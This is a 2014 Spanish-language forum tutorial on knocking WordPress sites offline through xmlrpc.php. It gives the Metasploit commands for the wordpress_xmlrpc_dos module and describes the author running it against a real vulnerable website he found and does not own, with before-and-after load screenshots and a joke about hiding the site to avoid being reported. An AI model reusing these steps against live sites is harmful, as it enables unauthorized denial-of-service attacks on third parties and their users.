Underc0de

[In]Seguridad Informática => Seguridad web y en servidores => Mensaje iniciado por: ZanGetsu en Septiembre 09, 2014, 03:26:33 PM

Título: DoS en Wordpress con xmlrpc.php
Publicado por: ZanGetsu en Septiembre 09, 2014, 03:26:33 PM
Que hay chicos les traigo este peque tuto

xmlrpc.php para que sirve?

Xmlrpc.php es el encargado de permitirnos postear remotamente a través de Microsoft Word, Textmate, Thunderbird, smartphones, entre otros clientes. Todo ello a través del protocolo XML-RPC.


Además será quien se encargue de recibir los pingbacks (enlaces de otros blogs hacía alguno de nuestros artículos) y enviar los trackbacks (enlaces de nuestro blog hacía artículos de otro blog).

Bueno ya la vulne de xmlrpc me la tope hace mucho tiempo (http://blackkzangetsu.blogspot.com/2...xplotable.html)
este archivo se usa para realizar un poderoso ataque Dos, en donde el amigo metasploit ya hizo su trabajo :D


msf > use auxiliary/dos/http/wordpress_xmlrpc_dos     
msf auxiliary(wordpress_xmlrpc_dos) > show actions           
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION <action-name>     
msf auxiliary(wordpress_xmlrpc_dos) > show options           
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run


Yo busque un website con wp versiones vulnerables: 3.5 - 3.9.2

(http://i.gyazo.com/e46a0b8b2231979fc71a4e5bc67f661f.png)

No muestro el website para demostrar algo de etica (na mentira para que no denuncien jajaj)

Despues de completar el rhost y targeturi le damos a run

(http://i.gyazo.com/1e8bca89ba3e000c4b33926d05c560f5.png)

y con esto estaremos empezando el dos, el website cae a ratos, pero veamos un test
de velocidad de carga antes y despues:

Antes:

(http://i.gyazo.com/e59c5bbc6c63d6f55d19a2957789d6c7.png)

Con el dos activo:

(http://i.gyazo.com/5d6205bb8cd4b80cf1a8a461a8391642.png)

(http://i.gyazo.com/493ebea8bb40cff4d0fe3491fc188ea1.png)

Saludos !